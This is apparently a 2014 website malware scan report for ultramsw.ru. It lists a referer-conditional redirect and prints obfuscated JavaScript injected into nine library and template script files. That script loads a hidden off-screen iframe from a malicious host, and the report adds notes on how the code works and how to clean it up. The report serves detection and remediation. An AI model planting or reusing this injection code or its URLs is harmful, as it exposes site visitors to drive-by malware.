Malicious/Suspicious Redirects
Request | Server response | Status |
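URL: http://www.ultramsw.ru/ (request imitating a visitor who arrives from a search engine) GET / HTTP/1.1 Host: www.ultramsw.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Found Cache-Control: max-age=0 Connection: close Date: Sun, 24 Aug 2014 07:24:18 GMT Location: http://decmexico.com/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html; charset=windows-1251 Expires: Sun, 24 Aug 2014 07:24:18 GMT | malicious |
Note: the same URL is listed under "Scanned pages/files" below with a 200 OK response, which suggests the redirect is conditional on the search-engine Referer header. A site owner who opens the page directly would then not see it; reproducing it requires sending a request with such a Referer, and the server-side configuration and scripts that can issue a 302 should be reviewed.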
Scanned pages/files
Request | Server response | Status |
http://www.ultramsw.ru/ | 200 OK Content-Length: 14613 Content-Type: text/html | clean |
http://www.ultramsw.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 67357 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below). The excerpt is truncated by the scanner: it breaks off inside the user-agent list, and the text that follows it (from "}if(b.condition)" onward) appears to be the file's original MooTools library code rather than part of the injected script. The injected script therefore sits inside a legitimate library file, so cleanup means restoring the file from a known-good copy, not deleting it. (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox }if(b.condition){d=function(k){if(b.condition.call(this,k,f)){return h.call(this,k);}return true;};}if(b.base){g=Function.from(b.base).call(this,f);}}var e=function(){return h.call(j); };var c=Element.NativeEvents[g];if(c){if(c==2){e=function(k){k=new DOMEvent(k,j.getWindow());if(d.call(j,k)===false){k.stop();}};}this.addListener(g,e,arguments[2]); }i[f].values.push(e);return this;},removeEvent:function(e,d){var c=this. Antivirus reports:
| ||
http://www.ultramsw.ru/media/system/js/core.js | 200 OK Content-Length: 1823 Content-Type: application/javascript | malicious |
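Malicious code - confirmed by antiviruses (see below). The listing shows only the start and the end of the injected script; the part between the user-agent list and the closing brace of ddd_prover_ua (including the getCookie/setCookie helpers) is cut by the scanner, so the excerpt is not complete code.
(function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })();
What the visible part does: ddd_prover_ua apparently compares the browser's user agent with the listed platforms and browsers, and the payload runs only when that check returns false. A marker cookie (lifetime value 86401, presumably seconds, i.e. about one day) limits the injection to once per browser in that period. The iframe tag and the cookie name are assembled from string fragments, so a search of the site's files for the literal strings "<iframe" or the full cookie name will miss it. The identifiers that are not split (ddd_prover_ua, igmorList, the iframe host) are the reliable strings to search for during cleanup. The iframe is positioned 1311px off-screen, so the visitor does not see it.
Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports: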
| ||
http://www.ultramsw.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 10013 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/media/system/js/modal.js | 200 OK Content-Length: 10015 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/components/com_k2/js/k2.js | 200 OK Content-Length: 8643 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox $K2('.k2Scroller').css('width',($K2('.k2Scroller').find('.k2ScrollerElement:first').outerWidth(true))*$K2('.k2Scroller').children('.k2ScrollerElement').length); }); // Equal block heights for the "default" view $K2(window).load(function () { var blocks = $K2('.subCategory, .k2EqualHeights'); var maxHeight = 0; blocks.each(function(){ maxHeight = Math.max(maxHeight, parseInt($K2(this).css('height'))); }); blocks.css('height', maxHeight); }); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/media/system/js/caption.js | 200 OK Content-Length: 2552 Content-Type: application/javascript | clean |
http://www.ultramsw.ru/plugins/content/tooltipgc/assets/tooltipgc.js | 200 OK Content-Length: 1823 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/modules/mod_image_show_gk4/styles/gk_black_and_white/engine.js | 200 OK Content-Length: 13265 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox item.anim_top.set(i%2 == 1 ? -$this[elID].wrap_height : $this[elID].wrap_height); item.anim_opacity.set(0); $this[elID].playing = false; }); }).delay($this[elID].options['anim_speed']); } } }, redirect: function(where, elID) { window.location = $this[elID].links[where]; } }); GK_IS_oct2010_12.implement(new Options); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/modules/mod_animateimages/js/jquery-1.4.2.min.js | 200 OK Content-Length: 73997 Content-Type: application/javascript | clean |
http://www.ultramsw.ru/templates/ultra/jquery.js | 200 OK Content-Length: 34589 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox t[h]}if(f.isEmptyObject(t)){var u=s.handle;u&&(u.elem=null),delete s.events,delete s.handle,f.isEmptyObject(s)&&f.removeData(a,b,!0)}}},customEvent:{getData:!0,setData:!0,changeData:!0},trigger:function(c,d,e,g){var h=c.type||c,i=[],j;h.indexOf("!")>=0&&(h=h.slice(0,-1),j=!0),h.indexOf(". Antivirus reports:
| ||
http://www.ultramsw.ru/templates/ultra/script.js | 200 OK Content-Length: 10013 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ddd_prover_ua(){ var igmorList = 'iPhone|Macintosh|Linux|iPad|Series40|SymbOS|Flock|SeaMonkey|Nokia|SlimBrowser|AmigaOS|Android|FreeBSD|Chrome|IEMobile|SymbianOS|Avant|Chromium|Firefox } if (!ddd_prover_ua()) { var cookie = getCookie('nairi20li7na3pro'+'poln19ne71ver10la'); if (cookie == undefined) { setCookie('nairi20li7na3pro'+'poln19ne71ver10la', true, 86401); document.write('<i'+'f'+'ra'+'me s'+'rc='+'"http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-'+'1311'+'px;top:-'+'1311px;" height="130" width="130" name="Nairi"></'+'i'+'fra'+'me>'); } } })(); Decoded script: <iframe src="http://bebefruit.i-heart-gifts.com/jtrsdfhjh.cgi?7" style="position:absolute;left:-1311px;top:-1311px;" height="130" width="130" name="Nairi"></iframe> Antivirus reports:
| ||
http://www.ultramsw.ru/collection/all-collections.html | 200 OK Content-Length: 23607 Content-Type: text/html | clean |
http://www.ultramsw.ru/collection/jacquards-prints.html | 200 OK Content-Length: 32899 Content-Type: text/html | clean |
http://www.ultramsw.ru/collection/chenilles-textures.html | 200 OK Content-Length: 22626 Content-Type: text/html | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ultramsw.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ultramsw.ru/
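Result: ultramsw.ru is not infected or malware details are not published yet.
Result: ultramsw.ru is not infected or malware details are not published yet.
Note: neither blacklist lists the site, although the scan above reports a malicious redirect and injected code in nine script files. Blacklist status lags behind a compromise and is not evidence that a site is clean; the findings of the scan itself take precedence.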